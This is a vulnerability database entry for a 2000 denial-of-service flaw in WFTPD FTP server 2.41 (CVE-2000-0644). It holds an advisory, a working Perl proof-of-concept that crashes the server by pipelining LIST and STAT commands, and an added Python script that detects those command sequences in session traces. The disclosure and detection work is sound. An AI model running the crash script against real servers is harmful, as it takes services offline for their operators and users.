WFTPD and WFTPD Pro Denial-of-Service Vulnerability

Vulnerability ID: 1105936
Vulnerability type: Unknown
Published: 2000-07-21
Updated: 2005-05-02
CVE ID: CVE-2000-0644
CNNVD-ID: CNNVD-200007-057
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/20100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200007-057
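|Vulnerability details
WFTPD and WFTPD Pro version 2.41 contain a vulnerability. A remote attacker can cause a denial of service by issuing a STAT command while a LIST command is still in progress.
|Exploit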
source: http://www.securityfocus.com/bid/1506/info

WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.

1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existent file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.

#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends STAT without waiting for LIST to finish, which will cause the server
# to crash.
#

use IO::Socket;

$host = "ftp.host.com";
$port = "21";
$user = "anonymous";
$pass = "p\@nda";
$wait = 10;

# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

# Issue a LIST command, then STAT. If the STAT arrives before the LISTing
# is finished, the server will crash.
print $socket "USER $user\nPASS $pass\nLIST\nSTAT\n";

# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}

# Finished.
close($socket);
print "\nConnection closed. Finished.\n";
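
Detection counterpart to items 1, 3 and 4 of the advisory above, as an added example that is not part of the original advisory or of the exploit author's script: it scans an FTP control-channel trace for STAT sent while a transfer command has no final reply yet, and for MLST sent before login. The `C:`/`S:` trace format, the name `scan_session` and the sample traces are assumptions constructed for illustration.

```python
# Added example (not from the original page): scan an FTP control-channel
# trace for the command sequences described in the advisory above.
# Assumed trace format: "C: <command>" for client, "S: <reply>" for server.
TRANSFER_CMDS = {"LIST", "NLST", "RETR", "STOR", "STOU", "APPE"}

def scan_session(lines):
    """Return [(line_no, finding), ...] for one control connection."""
    findings = []
    logged_in = False
    pending = None  # transfer command with no final server reply seen yet
    for no, raw in enumerate(lines, 1):
        side, _, text = raw.strip().partition(": ")
        if side == "S":
            code = text[:3]
            if not code.isdigit() or text[3:4] == "-":
                continue  # body or first line of a multi-line reply
            if code == "230":
                logged_in = True
            elif pending and code[0] in "245":
                # Simplification: any final 2xx/4xx/5xx reply ends the transfer.
                pending = None
        elif side == "C":
            verb = text.split(" ", 1)[0].upper()
            if verb == "STAT" and pending:
                findings.append((no, f"STAT while {pending} in progress"))
            elif verb == "MLST" and not logged_in:
                findings.append((no, "MLST before login"))
            elif verb in TRANSFER_CMDS:
                pending = verb
    return findings

# Constructed traces, not captured traffic.
PIPELINED = ["S: 220 Service ready", "C: USER anonymous",
             "C: PASS guest@example.invalid", "C: LIST", "C: STAT"]
NORMAL = ["S: 220 Service ready", "C: USER anonymous",
          "S: 331 Password required", "C: PASS guest@example.invalid",
          "S: 230 Logged in", "C: LIST", "S: 150 Opening data connection",
          "S: 226 Transfer complete", "C: STAT", "S: 211 Status"]
PRELOGIN_MLST = ["S: 220 Service ready", "C: MLST readme.txt"]

if __name__ == "__main__":
    for name, trace in [("pipelined", PIPELINED), ("normal", NORMAL),
                        ("prelogin-mlst", PRELOGIN_MLST)]:
        print(name, scan_session(trace))
```

RFC 959 permits STAT during a transfer, so these findings matter on hosts still running an affected WFTPD build, where the fix is upgrading past the affected release.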
|References

Source: BID
Name: 1506
Link: http://www.securityfocus.com/bid/1506
Source: BUGTRAQ
Name: 20000721 WFTPD/WFTPD Pro 2.41 RC11 vulnerabilities.
Link: http://archives.neohapsis.com/archives/bugtraq/2000-07/0295.html
Source: XF
Name: wftpd-stat-dos
Link: http://xforce.iss.net/static/5003.php
Source: OSVDB
Name: 1477
Link: http://www.osvdb.org/1477